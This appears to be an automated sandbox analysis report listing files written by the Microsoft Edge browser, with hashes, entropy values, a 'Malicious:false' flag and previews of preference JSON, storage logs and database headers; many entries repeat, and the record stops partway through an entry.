                                                                                                                                                                            SHA-512:BFF948B2C85717CFB8AFAD370296535F4F5A583E7B0D1D6A15785F28701D13240FD0301EFF65857B936B5623F341C9576109647C3A5CC49DAA1ABC25F59CB99C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378379978349499","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378379978349499","location":5,"ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                            Entropy (8bit):5.567883867304443
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:MhD7sSWPMOfKd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP2CnOrwDbpttuH:MhD7sSWPMOfKdu1jaCrnLDntA
                                                                                                                                                                            MD5:C0C4E0A053D200A0666279081CE6D109
                                                                                                                                                                            SHA1:03F5A6591FC16A5EB3893A2411427B4FA43A254C
                                                                                                                                                                            SHA-256:67BEBB8805E8C681BE818BB528218113F63624340704878EB0AAA8CB8F6C10EB
                                                                                                                                                                            SHA-512:BFF948B2C85717CFB8AFAD370296535F4F5A583E7B0D1D6A15785F28701D13240FD0301EFF65857B936B5623F341C9576109647C3A5CC49DAA1ABC25F59CB99C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378379978349499","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378379978349499","location":5,"ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):25012
                                                                                                                                                                            Entropy (8bit):5.567883867304443
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:768:MhD7sSWPMOfKd8F1+UoAYDCx9Tuqh0VfUC9xbog/OVP2CnOrwDbpttuH:MhD7sSWPMOfKdu1jaCrnLDntA
                                                                                                                                                                            MD5:C0C4E0A053D200A0666279081CE6D109
                                                                                                                                                                            SHA1:03F5A6591FC16A5EB3893A2411427B4FA43A254C
                                                                                                                                                                            SHA-256:67BEBB8805E8C681BE818BB528218113F63624340704878EB0AAA8CB8F6C10EB
                                                                                                                                                                            SHA-512:BFF948B2C85717CFB8AFAD370296535F4F5A583E7B0D1D6A15785F28701D13240FD0301EFF65857B936B5623F341C9576109647C3A5CC49DAA1ABC25F59CB99C
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13378379978349499","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13378379978349499","location":5,"ma
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):194
                                                                                                                                                                            Entropy (8bit):2.8096948641228403
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:S8ltHlS+QUl1ASEGhTFljljljljljljljl:S85aEFljljljljljljljl
                                                                                                                                                                            MD5:D7D9437445AA960DCEA52FFE772822DC
                                                                                                                                                                            SHA1:C2BBF4AC0732D905D998C4F645FD60F95A675D02
                                                                                                                                                                            SHA-256:4FF49903BEC1197017A35995D5C5FC703CAF9D496467345D783F754B723D21C1
                                                                                                                                                                            SHA-512:335EB1BA85670550ED1E1E4E14EA4B5D14F8306125BF147A42DE4DEF5E5F75F14C422B014414030CF30378C04F748AC875CF056ADDA196511A0B057B3598FE9A
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................&f.................&f.................&f...............
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):324
                                                                                                                                                                            Entropy (8bit):5.118891996796223
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:70RM+q2P923oH+TcwtrQMxIFUt8O8uZmw+OCaMVkwO923oH+TcwtrQMFLJ:7n+v4YebCFUt8OP/+OaV5LYebtJ
                                                                                                                                                                            MD5:29FDEC1A0FECCCBF13B6C88A8C7435DD
                                                                                                                                                                            SHA1:A75C17882E52E8FC4CFEA7C653EC4C8179DD9645
                                                                                                                                                                            SHA-256:8DB6C07BA22BBB1EC14FE69D07AAA00E0EDE7397EB3E0BF98C4FF26461EC181F
                                                                                                                                                                            SHA-512:B9E4EF23C317B268F412AAB40A1CD74CDB44AFF73C48082A17EEFEB21483BBD79A830E9522134667CCEA9EEF11A5679F4A4D5E6F94E8FD38A913E495F76DC5D1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:55.811 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/11-03:39:55.819 10ac Recovering log #3.2024/12/11-03:39:55.841 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):324
                                                                                                                                                                            Entropy (8bit):5.118891996796223
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:70RM+q2P923oH+TcwtrQMxIFUt8O8uZmw+OCaMVkwO923oH+TcwtrQMFLJ:7n+v4YebCFUt8OP/+OaV5LYebtJ
                                                                                                                                                                            MD5:29FDEC1A0FECCCBF13B6C88A8C7435DD
                                                                                                                                                                            SHA1:A75C17882E52E8FC4CFEA7C653EC4C8179DD9645
                                                                                                                                                                            SHA-256:8DB6C07BA22BBB1EC14FE69D07AAA00E0EDE7397EB3E0BF98C4FF26461EC181F
                                                                                                                                                                            SHA-512:B9E4EF23C317B268F412AAB40A1CD74CDB44AFF73C48082A17EEFEB21483BBD79A830E9522134667CCEA9EEF11A5679F4A4D5E6F94E8FD38A913E495F76DC5D1
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:55.811 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/11-03:39:55.819 10ac Recovering log #3.2024/12/11-03:39:55.841 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):349
                                                                                                                                                                            Entropy (8bit):5.102394987658359
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7Qm4q2P923oH+Tcwt7Uh2ghZIFUt8OQmJZmw+OikwO923oH+Tcwt7Uh2gnLJ:7Qm4v4YebIhHh2FUt8OQmJ/+Oi5LYebs
                                                                                                                                                                            MD5:01511315FCF4B95BB89B60AF4D96116E
                                                                                                                                                                            SHA1:935530334A6490A5469806DFD710CD40E945A127
                                                                                                                                                                            SHA-256:A9364ADF41F9C31ABC578DFFCAAAA13B59B7C5A0216F0C18C2CEF57B55A2EC07
                                                                                                                                                                            SHA-512:3D3F84F43F00463DDBA8C04972906B3B25A218FB3853ECA93387D58F5307EC2788F07802191ED397CF37EA8F51272C4657FFE3D7EF927D60F81C3110FA39F2E8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.282 ee4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/11-03:39:38.282 ee4 Recovering log #3.2024/12/11-03:39:38.283 ee4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):349
                                                                                                                                                                            Entropy (8bit):5.102394987658359
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7Qm4q2P923oH+Tcwt7Uh2ghZIFUt8OQmJZmw+OikwO923oH+Tcwt7Uh2gnLJ:7Qm4v4YebIhHh2FUt8OQmJ/+Oi5LYebs
                                                                                                                                                                            MD5:01511315FCF4B95BB89B60AF4D96116E
                                                                                                                                                                            SHA1:935530334A6490A5469806DFD710CD40E945A127
                                                                                                                                                                            SHA-256:A9364ADF41F9C31ABC578DFFCAAAA13B59B7C5A0216F0C18C2CEF57B55A2EC07
                                                                                                                                                                            SHA-512:3D3F84F43F00463DDBA8C04972906B3B25A218FB3853ECA93387D58F5307EC2788F07802191ED397CF37EA8F51272C4657FFE3D7EF927D60F81C3110FA39F2E8
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:38.282 ee4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/11-03:39:38.282 ee4 Recovering log #3.2024/12/11-03:39:38.283 ee4 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                            Entropy (8bit):0.0018238520723782249
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zEfl431tl:/M/xT02z7l
                                                                                                                                                                            MD5:F3F8BC00336A66CCBA46F7E563FECAAF
                                                                                                                                                                            SHA1:663539C01B112A1B2F1C13E6943EE6B40C633CC1
                                                                                                                                                                            SHA-256:21D159763434DF325172749F3033AC1C6B36C68B1CB13CA49AD0215FD69AAAA3
                                                                                                                                                                            SHA-512:A47EB71C6C728E722D86E21308983D66A56FE4F707A38A56A2A5CDCD9B9B2B2EFBD62EE8CE039DF073904B02C812BF4F112A0E5DCCE4C00D5DCDD1C234A7CE7E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):270336
                                                                                                                                                                            Entropy (8bit):0.0012471779557650352
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                            MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                            SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                            SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                            SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):434
                                                                                                                                                                            Entropy (8bit):5.225216471612671
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:7x+v4YebvqBQFUt8OY/+OqiV5LYebvqBvJ:7G4YebvZg8O4qELYebvk
                                                                                                                                                                            MD5:5F518E367271FD6D0662AE80267CBCF6
                                                                                                                                                                            SHA1:1DEF69E2C11723625A7A1141B11DA608036FF162
                                                                                                                                                                            SHA-256:07F6CD8AFD164F10E4819E3741440649CBC5072E7FBB4B3146723270EAEFB705
                                                                                                                                                                            SHA-512:8460BB4890B574261E0C42E050A657996E4CB6FF24C925F3B358E6CC349617D7DFE55C8688F3D3E3F8B1FC000BDB5D2D1221B36A97F68B23228B03AE06F11426
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.565 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/11-03:39:39.566 10ac Recovering log #3.2024/12/11-03:39:39.569 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):434
                                                                                                                                                                            Entropy (8bit):5.225216471612671
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:7x+v4YebvqBQFUt8OY/+OqiV5LYebvqBvJ:7G4YebvZg8O4qELYebvk
                                                                                                                                                                            MD5:5F518E367271FD6D0662AE80267CBCF6
                                                                                                                                                                            SHA1:1DEF69E2C11723625A7A1141B11DA608036FF162
                                                                                                                                                                            SHA-256:07F6CD8AFD164F10E4819E3741440649CBC5072E7FBB4B3146723270EAEFB705
                                                                                                                                                                            SHA-512:8460BB4890B574261E0C42E050A657996E4CB6FF24C925F3B358E6CC349617D7DFE55C8688F3D3E3F8B1FC000BDB5D2D1221B36A97F68B23228B03AE06F11426
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:39.565 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/11-03:39:39.566 10ac Recovering log #3.2024/12/11-03:39:39.569 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):40
                                                                                                                                                                            Entropy (8bit):4.1275671571169275
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                            MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                            SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                            SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                            SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):36864
                                                                                                                                                                            Entropy (8bit):0.3886039372934488
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                            MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                            SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                            SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                            SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:JSON data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):2
                                                                                                                                                                            Entropy (8bit):1.0
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:H:H
                                                                                                                                                                            MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                            SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                            SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                            SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:[]
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:data
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):80
                                                                                                                                                                            Entropy (8bit):3.4921535629071894
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                            MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                            SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                            SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                            SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:*...#................version.1..namespace-..&f.................&f...............
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):422
                                                                                                                                                                            Entropy (8bit):5.2385261366112195
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:7iN+v4YebvqBZFUt8Ouu/+OqqV5LYebvqBaJ:7D4Yebvyg8OuetLYebvL
                                                                                                                                                                            MD5:051F4D567CD36EC397CC735B4BBD745C
                                                                                                                                                                            SHA1:640F3FA7269EFCBEEE0E48058CE17AA73CD5C839
                                                                                                                                                                            SHA-256:9CB033855DB571376FBF9F4D3E10912DD3485DDAA9C9DDBA60DD3E6D15C6BABE
                                                                                                                                                                            SHA-512:25E413AE5797E193153DFFFF5C7D2A2D2E0B0E7BC55D04E5EC1416AFFFE75FC16BBBA6BB70CC3B6643C3738E2A9D9DDF980829E772E9C05CFF09746CBFB17C9E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:55.892 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/11-03:39:55.893 10ac Recovering log #3.2024/12/11-03:39:55.897 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):422
                                                                                                                                                                            Entropy (8bit):5.2385261366112195
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:12:7iN+v4YebvqBZFUt8Ouu/+OqqV5LYebvqBaJ:7D4Yebvyg8OuetLYebvL
                                                                                                                                                                            MD5:051F4D567CD36EC397CC735B4BBD745C
                                                                                                                                                                            SHA1:640F3FA7269EFCBEEE0E48058CE17AA73CD5C839
                                                                                                                                                                            SHA-256:9CB033855DB571376FBF9F4D3E10912DD3485DDAA9C9DDBA60DD3E6D15C6BABE
                                                                                                                                                                            SHA-512:25E413AE5797E193153DFFFF5C7D2A2D2E0B0E7BC55D04E5EC1416AFFFE75FC16BBBA6BB70CC3B6643C3738E2A9D9DDF980829E772E9C05CFF09746CBFB17C9E
                                                                                                                                                                            Malicious:false
                                                                                                                                                                            Preview:2024/12/11-03:39:55.892 10ac Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/11-03:39:55.893 10ac Recovering log #3.2024/12/11-03:39:55.897 10ac Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .
                                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                            Category:dropped
                                                                                                                                                                            Size (bytes):328
                                                                                                                                                                            Entropy (8bit):5.201117771657053
                                                                                                                                                                            Encrypted:false
                                                                                                                                                                            SSDEEP:6:7Oo9+q2P923oH+TcwtpIFUt8ORWrNJZmw+ORWrN9VkwO923oH+Tcwta/WLJ:7OXv4YebmFUt8OwrX/+OwrF5LYebaUJ
                                                                                                                                                                            MD5:9A1F68782675BDA0DB1E8B6D9A426F54
                                                                                                                                                                            SHA1:FE113A5DB042A06925FB80C14F5E5263219AB22C
                                                                                                                                                                            SHA-256:0D96C61542839154CBD8638387309712B6E21BC6D1371637FA945B286654CD0A
